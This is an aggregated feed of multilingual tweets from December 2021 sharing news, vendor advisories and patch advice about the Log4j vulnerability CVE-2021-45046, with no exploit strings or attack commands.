2021-12-16 14:02:14Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨 Browsing: https://t.co/8PaMPxFuIi #ニュース #feedly http://codezine.jp/article/detail/15346sesuna
2021-12-16 14:00:13Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 5.5M (audience size) CVE-2021-45046: 3.5M CVE-2021-208… https://t.co/d3neZlWhJs https://twitter.com/i/web/status/1471480237775114242CVEtrends
2021-12-16 13:53:16java: CVE - CVE-2021-45046 https://t.co/2nSputlrKO https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046RSS_hateb_l_Roy
2021-12-16 13:52:34java: JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/TUEujv4gXe https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/RSS_hateb_l_Roy
2021-12-16 13:50:12@arstechnica @dangoodin001 CVE-2021-45046 is a CVSS 3.7, a far cry from the CVSS 10 score of CVE-2021-44228. The co… https://t.co/4DjgseqoJ4 https://twitter.com/i/web/status/1471477672303857670erickolb
2021-12-16 13:44:02A second vulnerability involving Apache Log4j was discovered and is tracked as CVE-2021-45046. This vulnerability e… https://t.co/QiNnLiLXYw https://twitter.com/i/web/status/1471472729870192649CswWorks
2021-12-16 13:40:11@schniggie @_atorralba @testanull @atorralba CVE-2021-45046 should covers them. Advisory talks about ThreadContext… https://t.co/OZ1DDbNHkC https://twitter.com/i/web/status/1471475070262558721pwntester
2021-12-16 13:31:30Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨 https://t.co/uskB7AvNcU https://codezine.jp/article/detail/15346yosilove
2021-12-16 13:30:33Attackers have started exploiting the 2nd Log4J vulnerability (CVE-2021-45046), while a third vulnerability has alr… https://t.co/Sgs4FjoKlo https://twitter.com/i/web/status/14714720205127229541nt3l_GS_N3ws
2021-12-16 13:02:55URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for th… https://t.co/YOXNOAtBsP https://twitter.com/i/web/status/1471463465185390595ksg93rd
2021-12-16 13:01:28@pwntester @atorralba Nice work! So effectively this increases the CVSS score of the CVE-2021-45046 because it now… https://t.co/eGFWEJlFdI https://twitter.com/i/web/status/1471464311382056966cyberApostle
2021-12-16 13:01:14@testanull @atorralba CVE-2021-45046 should covers them. Advisory talks about ThreadContext but it can be any other… https://t.co/uuClSa31u6 https://twitter.com/i/web/status/1471464806842519552pwntester
2021-12-16 12:51:36JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/Sq4nAlTKO6 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/3meter_sann
2021-12-16 12:51:29JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/FEk6nCgubY https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/moneymog
2021-12-16 12:20:38JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/KgzcNFyVmO https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/nov65536
2021-12-16 12:10:53Attackers have started exploiting the 2nd Log4J vulnerability (CVE-2021-45046), while a third vulnerability has alr… https://t.co/e0i6VkDrG9 https://twitter.com/i/web/status/1471451245110087687TCybersecurityC
2021-12-16 12:00:42脆弱性あるある。修正後に即突破されて再パッチ JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/zmYtFoDQqV https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/sou1ka
2021-12-16 11:50:53Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has a… https://t.co/k5qhfWt7I6 https://twitter.com/i/web/status/1471445224685666306YourAnonRiots
2021-12-16 11:40:19@edward_c @RatliffSe @4mp3d @WeldPond CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Look… https://t.co/fUj0bDCRnM https://twitter.com/i/web/status/1471443881791299584ClarkQwertyuiop
2021-12-16 11:40:16Attackers have started exploiting the 2nd Log4J vulnerability (CVE-2021-45046), while a third vulnerability has alr… https://t.co/QYuYM3F3aR https://twitter.com/i/web/status/1471444245995302920AlirezaGhahrood
2021-12-16 11:40:14#Log4j #IBM #WebSphere Advice on responding to CVES CVE-2021-44228, CVE-2021-4104 and CVE-2021-45046 for users of W… https://t.co/hgHWqcpr8t https://twitter.com/i/web/status/1471444330669912067WebSphereMex
2021-12-16 11:40:07Attackers have started exploiting the 2nd Log4J vulnerability (CVE-2021-45046), while a third vulnerability has alr… https://t.co/r4oAUSPQVm https://twitter.com/i/web/status/1471444775228219394doukkalli
2021-12-16 11:20:41そんなこともあるだろうなと思いアップデートとともに任意のログが出せないように変更していてよかった みなさん、またお仕事です JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046… https://t.co/VrMeURN7q6 https://twitter.com/i/web/status/1471438051272699910negisaltchicken
2021-12-16 11:20:28@tableau While this is an improvement, this version has still security issues (CVE-2021-45046) and therefore there… https://t.co/GrA3GBAAnt https://twitter.com/i/web/status/1471438574851604485TechnoRondo
2021-12-16 11:10:37Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has a… https://t.co/CYvngiUWP1 https://twitter.com/i/web/status/1471435591292178432DigitalEdwyn
2021-12-16 11:00:23JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/sL3S5ikGkU https://ift.tt/3spkbwnmagiauk
2021-12-16 11:00:14关于Apache Log4j2 RCE漏洞后出现的CVE-2021-4104/CVE-2021-45046漏洞说明 https://t.co/HQ4EcVqBlS https://t.co/IaA5hDiHVK https://ift.tt/3E31PTT https://ift.tt/3dUas8Cbuaqbot
2021-12-16 10:50:41[タレ]Log4jに新たな脆弱性発覚 https://t.co/xaLoKnwduN JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/cuuXuiWg8a https://srad.jp/submission/96563/ https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/slashplus
2021-12-16 10:50:24Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/EJVuW6HJjG https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/zephel01
2021-12-16 10:50:22Apache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228, CVE-2021-4104, CVE-2021-45046 ) https://t.co/ZJub5dT3w9 https://security.sios.com/vulnerability/misc-security-vulnerability-20211212.htmlzephel01
2021-12-16 10:30:21Part 2/ The new #vulnerability, CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (… https://t.co/W2U9V2OHCy https://twitter.com/i/web/status/1471425218585448455cyberplural
2021-12-16 10:30:17CVE-2021-45046 ALL 1/2 https://t.co/3tzyWSGXxy https://t.co/emTfZpvtnM https://t.co/L6hNQYqJiG… https://t.co/XNeKflEXlz https://opensearch.org/blog/releases/2021/12/update-to-1-2-1/ https://www.openwall.com/lists/oss-security/2021/12/14/4 https://www.zdnet.com/article/second-log4j-vulnerability-found-apache-log4j-2-16-0-released/?utm_source=dlvr.it&utm_medium=twitter#ftag=RSSbaffb68 https://twitter.com/i/web/status/147142526062925005101_security_01
2021-12-16 10:30:14CVE-2021-45046 final https://t.co/hZVzNWQknA https://t.co/V2Yy7XFZpO https://www.redpacketsecurity.com/google-fixed-the-17th-zero-day-in-chrome-since-the-start-of-the-year/ https://cert.be/en/patch-tuesday-multiple-severe-vulnerabilities-multiple-microsoft-products01_security_01
2021-12-16 10:20:34Paid subscriptions now detect CVE-2021-45046 vulnerable file too ! You can now scan your servers for Log4j using… https://t.co/ZujtECgd9l https://twitter.com/i/web/status/1471422647783284745SecuriteInfoCom
2021-12-16 10:20:19Reference: CVE-2021-45046 "AND" DOS https://t.co/emTfZpvtnM https://t.co/L6hNQYqJiG https://t.co/EBgvLR23cM https://t.co/6yERTWLa9O https://www.openwall.com/lists/oss-security/2021/12/14/4 https://www.zdnet.com/article/second-log4j-vulnerability-found-apache-log4j-2-16-0-released/?utm_source=dlvr.it&utm_medium=twitter#ftag=RSSbaffb68 https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?utm_source=dlvr.it&utm_medium=twitter https://www.truesec.com/hub/blog/apache-log4j-injection-vulnerability-cve-2021-44228-impact-and-response01_security_01
2021-12-16 10:20:07#CVE-2021-45046, identifican otra vulnerabilidad #log4j2 que permite ejecutar código malicioso https://t.co/1Lfys4Q02p https://www.linuxadictos.com/identificaron-otra-vulnerabilidad-log4j-2-que-permite-ejecutar-codigo-malicioso.htmlrkx73
2021-12-16 10:10:10JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/4aTkZj875N https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/mAeng17131565
2021-12-16 10:00:27Oracle Security Blog: Updates about Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046) https://t.co/ztIZyRNZaK https://blogs.oracle.com/security/post/log4j-vulnerabilitiessiebel_ess
2021-12-16 09:50:06Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has a… https://t.co/z3JVa8Lori https://twitter.com/i/web/status/1471417315371716614security_wang
2021-12-16 09:30:30@isotopp Ja. https://t.co/WvMFhn3H3z Update log4j version to 2.16.0 (CVE-2021-45046). https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16ezhenech
2021-12-16 09:30:13Ataque "de moda" por ejecución remota de código en Apache Log4j (CVE-2021-44228 CVE-2021-45046): NECESARIO actualiz… https://t.co/TORzqoGQLM https://twitter.com/i/web/status/1471411410722861063ticupm
2021-12-16 09:00:46@KushaDraoIa qué tercera, de qué hablas no me des más miedo, de log4shell sólo está la original y CVE-2021-45046 no… https://t.co/vXRvRCr2mH https://twitter.com/i/web/status/1471402399600451590V_Epokhe
2021-12-16 09:00:34@KushaDraoIa esa es CVE-2021-45046, que fuerza a tener que reactualizar a la 2.16V_Epokhe
2021-12-16 09:00:26泥沼が底なし沼になってきた😱 要約「Log4j v2.15.0に、既報のDoS攻撃(CVE-2021-45046)に加えて、情報漏洩の脆弱性が見つかった」 https://t.co/i6kw2J3ths https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.htmlnharuki
2021-12-16 09:00:05“JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能” https://t.co/u8ObIYfcYf https://htn.to/3jiqKxWP9kyuki_20211
2021-12-16 08:51:41JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/WMiCqtmEYa https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/hitobb_2477
2021-12-16 08:50:05Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has a… https://t.co/2C2v8AU5s1 https://twitter.com/i/web/status/1471402215713636353unix_root
2021-12-16 08:50:04JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/q6jbasLvEg https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/yaociela
2021-12-16 08:38:37JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/uDufROSDYD https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/MCPE_Yossi1114
2021-12-16 08:36:53JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/rEdPwKZMKU https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/kenko1026
2021-12-16 08:29:43New post from https://t.co/9KYxtdZjkl (K32171392: Apache Log4j2 vulnerability CVE-2021-45046) has been published on https://t.co/EutjzdD5Jf http://www.sesin.at https://www.sesin.at/2021/12/16/k32171392/www_sesin_at
2021-12-16 08:29:15New post from https://t.co/uXvPWJy6tj (K32171392: Apache Log4j2 vulnerability CVE-2021-45046) has been published on https://t.co/yqeGPAZBno http://www.sesin.at https://www.sesin.at/2021/12/16/k32171392/WolfgangSesin
2021-12-16 08:28:43GIGAZINE: JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/Vqq5iwioOU https://ift.tt/3spkbwnX5news
2021-12-16 08:21:53JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/LBcwumtKX9 https://ift.tt/3spkbwnNEWS_0
2021-12-16 08:05:47#VxRail VxRail Manager workaround now remediate Log4Shell (CVE-2021-44228/CVE-2021-45046) vulnerabilities. More inf… https://t.co/yEWUzmbs4C https://twitter.com/i/web/status/1471387891477659650VRMware
2021-12-16 07:50:16Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has a… https://t.co/0tNaQERLRG https://twitter.com/i/web/status/1471387116168957952Swati_THN
2021-12-16 07:32:25Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨 https://t.co/kEkTXhfQL0 https://t.co/N0Faw3m1oq http://codezine.jp/article/detail/15346hon_dana_org
2021-12-16 07:31:35CVE - CVE-2021-45046 https://t.co/Nxq11f4qeF https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046techtrend12
2021-12-16 07:25:35Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨 https://t.co/RwmvNaFwXz https://t.co/VzPHygdWkh http://dlvr.it/SFT2WrTechSc0pe
2021-12-16 07:25:10JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/GG076gtSDz https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/umekichinano
2021-12-16 07:24:55Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has a… https://t.co/4a1umrSPuA https://twitter.com/i/web/status/1471378183886942212PCFIXITAUST
2021-12-16 07:10:32log4j の 2.15が出たと思ったら、2.16も出てたでござる。 CVE-2021-45046:Log4j のセキュリティ脆弱性 (2件目) が発見 #aqua #セキュリティ #脆弱性 #java #CVE202145046… https://t.co/Oh3uBQ4OAi https://twitter.com/i/web/status/1471376817512927232s_miyaza
2021-12-16 07:01:41Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has a… https://t.co/W17pGx8jQX https://twitter.com/i/web/status/1471373306502787072emuli254
2021-12-16 06:51:15This is horrendous! CVE-2021-44228 is now superseded by CVE-2021-45046! FIXING the FIX!digiuniverse
2021-12-16 06:45:19CVE-2021-45046:Log4j のセキュリティ脆弱性 (2件目) が発見 #aqua #セキュリティ #脆弱性 #java #CVE202145046 #log4j - https://t.co/EdZkmP5Iic https://www.creationline.com/lab/47474creationline
2021-12-16 06:44:17"Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has… https://t.co/Gl9FIuKQUi https://twitter.com/i/web/status/1471367606745681920trip_elix
2021-12-16 06:30:30Attackers have started exploiting the 2nd #Log4J vulnerability (CVE-2021-45046), while a third #vulnerability has a… https://t.co/72IhbikFxG https://twitter.com/i/web/status/1471366784074715136TheHackersNews
2021-12-16 06:30:22Attackers have started exploiting the 2nd Log4J vulnerability (CVE-2021-45046), while a third vulnerability has alr… https://t.co/5pNQQiWZB9 https://twitter.com/i/web/status/1471366922600124417IT_news_for_all
2021-12-16 06:20:45< 最新のJavaニュース > <b>Java</b>のLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚 ... <b>Java</b>のログ出力ライブラリであるLog4j… https://t.co/4vkqFG4Avu https://twitter.com/i/web/status/1471363069892833280techstock_int
2021-12-16 06:20:06JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 #SmartNews https://t.co/BKK6XM2kcS https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/yuki39_whitecat
2021-12-16 06:11:05脆弱性の総称がLog4Shellになったらしく、シェル扱いが晴れて公式ネタにw Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨:CodeZi… https://t.co/ERwgy8kUhs https://twitter.com/i/web/status/1471359808032940035ido_kara_deru
2021-12-16 06:10:07Log4Jの脆弱性CVE-2021-45046の対策も考慮すると ・バージョン2.16.0(Java 8以降用)、もしくは2.12.2(Java 7用)にアップデートする ・log4j-core.jarからJndiLookup.classを削除する の2択です。A_zs_Blog
2021-12-16 05:56:33JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚 ... https://t.co/sCpaOxpQCe https://t.co/uN07eTtOWU http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-16%2014%3A30 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/sec_trend
2021-12-16 05:54:26How to Automatically Mitigate Log4Shell via a Live Patch (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/sB7kxCyaGi https://www.lunasec.io/docs/blog/log4shell-live-patch/JelleVictoor
2021-12-16 05:50:29CVE-2021-44228の次はCVE-2021-45046が見つかったんですね… https://t.co/YMR1AOWcnK https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/AmyuLilly
2021-12-16 05:43:17「Context LookupあるいはThread Context Map」こんなん使ってる人おらんと思う。 / “JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、… https://t.co/UutlIirkSP https://twitter.com/i/web/status/1471353318157209602NOV1975_2
2021-12-16 05:40:22さてはて。:JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/0V8cxRtpEt https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/okazakilive
2021-12-16 05:33:12.@FortiGuardLabs Threat Signal Report: New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service… https://t.co/BGHelZNJiX https://twitter.com/i/web/status/1471350263235624960gabrielauyong
2021-12-16 05:22:37Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨 https://t.co/ooZVS788R1 http://codezine.jp/article/detail/15346CollectorIt
2021-12-16 05:21:55Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨:CodeZine(コードジン) https://t.co/DnPgzMiWuk https://bit.ly/3dX5x6Ycomonacojp
2021-12-16 05:21:19Log4Shellの新たな脆弱性「CVE-2021-45046」が発見、LunaSecはバージョン2.16.0へのアップグレードを推奨 https://t.co/g6Dzkq87Ab http://codezine.jp/article/detail/15346codezine
2021-12-16 05:17:38Pocket New item archived: JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - https://t.co/TAjSMkZ1rc https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/harasu_onigiri
2021-12-16 05:10:52JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/JK8rbckWQI 仕事を増やすな。シバくぞ https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/5vhrg0
2021-12-16 04:51:45CVE-2021-45046: Second #Log4j Security Vulnerability Discovered https://t.co/gI44PYC6qi https://blog.aquasec.com/second-log4j-security-vulnerabilityAdviseQ
2021-12-16 04:51:311件のコメント https://t.co/z69NwGHv70 “JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能” (7 users) https://t.co/odFfyw3fj9 https://b.hatena.ne.jp/entry/s/gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/#utm_campaign=bookmark_share&utm_content=gigazine.net&utm_medium=social&utm_source=twitter&utm_term=%E3%83%86%E3%82%AF%E3%83%8E%E3%83%AD%E3%82%B8%E3%83%BC%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3 https://htn.to/iHKgq5AHCashogookamoto
2021-12-16 04:41:59JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/GOtiyNqvvd https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/garbage_bx
2021-12-16 04:30:15JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/aK1WlSlvx2 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/sutest1101
2021-12-16 04:21:56JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/kBIQ5FtYrQ https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/it_hatebu
2021-12-16 04:20:11🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/i3ahW9qjPw https://twitter.com/i/web/status/1471334155346661381threatintelctr
2021-12-16 04:13:00JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/468OMvj8nm https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/ohhara_shiojiri
2021-12-16 04:01:59またもや…。 JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/SjeIaaUm0A https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/BhM4GaVtj03xzwB
2021-12-16 04:01:19【重要】GitLab の log4j RCE脆弱性 (CVE-2021-44228, CVE-2021-45046) に対する対処。 SAST または Dependency Scanを使っている方は対処してください。… https://t.co/zKMET2YvWT https://twitter.com/i/web/status/1471327815635443712jeffi7
2021-12-16 03:51:33JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE - https://t.co/0xP9DZuR4k https://bit.ly/3F3GbA4harasu_onigiri
2021-12-16 03:51:12JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/VesL3Ho9HG https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/fake_mister
2021-12-16 03:41:33“JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能” https://t.co/QzlCA0Biun https://htn.to/2dp6iQWZAGco_jit
2021-12-16 03:40:34JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/OLvzpTbYX4 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/itit31
2021-12-16 03:40:30JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/45LITcDRJ3 止まりませんねぇ… https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/wing_ghost
2021-12-16 03:33:14Synack は #Log4j の脆弱性が発表されてから、SRTにより対応を開始しておりますが、日本でもアナウンスさせて頂きました。CVE-2021-45046にも対応しております。 https://t.co/YWf4rnCR11 https://twitter.com/SynackJ/status/1471317258509365248SynackJ
2021-12-16 03:32:37JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/L2uQ02AtzM https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/seiya_kawano
2021-12-16 03:32:16【重要】GitLab の log4j RCE脆弱性 (CVE-2021-44228, CVE-2021-45046) に対する対処。 SAST および/または Dependency Scanを使っている方は対処してください。 Gi… https://t.co/9hqzbpB24k https://twitter.com/i/web/status/1471319931333791752jeffi7
2021-12-16 03:31:51JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - https://t.co/0hq8qKZzsC https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/ka0com
2021-12-16 03:31:35やっとLookup機能そのものを消した模様 → JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/AfNLRBpaqx https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/chromarock
2021-12-16 03:31:33~ Cloudflare Blog ~  Log4J 関連、2つめの CVE (CVE-2021-45046) も Cloudflare WAF で対応していますが、Log4J の 2.16.0 へのUpgrade を https://t.co/ppMRTAAuSd https://lnkd.in/dzV4dXzsKeioCF
2021-12-16 03:11:41JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/SP2exVh5YK https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/12648430
2021-12-16 03:04:36» JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/f6r02M4sMU https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/rxgnlm
2021-12-16 03:03:15JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/0xbV4CBVLH https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/bot_06034206
2021-12-16 02:58:37CVE-2021-45046 についても追記され始めました VMSA-2021-0028.3 https://t.co/XEprDfiriQ https://www.vmware.com/security/advisories/VMSA-2021-0028.htmlJangari_nTK
2021-12-16 02:58:16CVE-2021-45046 😢😢😢😢anshumanch
2021-12-16 02:56:27JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/zbtaHAqcvz https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/kotatsu_mi
2021-12-16 02:54:08JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/gEEDhsqs97 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/tohallow
2021-12-16 02:52:24JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/j1uJhZrKxf https://t.co/juq6PdL2HS https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/Arcturu04503391
2021-12-16 02:40:31In addition to 'Log4Shell', a new vulnerability 'CVE-2021-45046' was discovered in Java&#39;s Log4j library and can… https://t.co/VM1eCU9MtG https://twitter.com/i/web/status/1471304137778221059gigazine_en
2021-12-16 02:39:05JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/hVNVWTtbQi https://gigaz.in/32c8bDmgigazine
2021-12-16 02:38:28Java's Log4j library reveals a new vulnerability ,CVE-2021-45046, in addition to Log4Shell, and is available in an… https://t.co/U5Mdps6Jvo https://twitter.com/i/web/status/1471301663751385091YourNewBooks
2021-12-16 02:36:31JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/FaSbgvW9tM https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/mugi_mugi
2021-12-16 02:32:52この師走に至って泣きっ面に蜂だわ・・・Javaのガバガバさは何とかならんのか・・・。 JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 -… https://t.co/eHjidmOP7I https://twitter.com/i/web/status/1471302339915304963bluesomebeta
2021-12-16 02:29:59JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/0HzlMDXp39 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/arafi2010
2021-12-16 02:29:30The latest update for #Netskope includes "CVE-2021-45046: #New Log4j Vulnerability Discovered" and "Netskope Named… https://t.co/ZRiHwwhdWS https://twitter.com/i/web/status/1471302613945753600opsmatters_uk
2021-12-16 02:27:15JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能... https://t.co/SxWNAijiOR https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/gacyagon
2021-12-16 02:27:00JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/7BtpkfB5Oq https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/structure0000
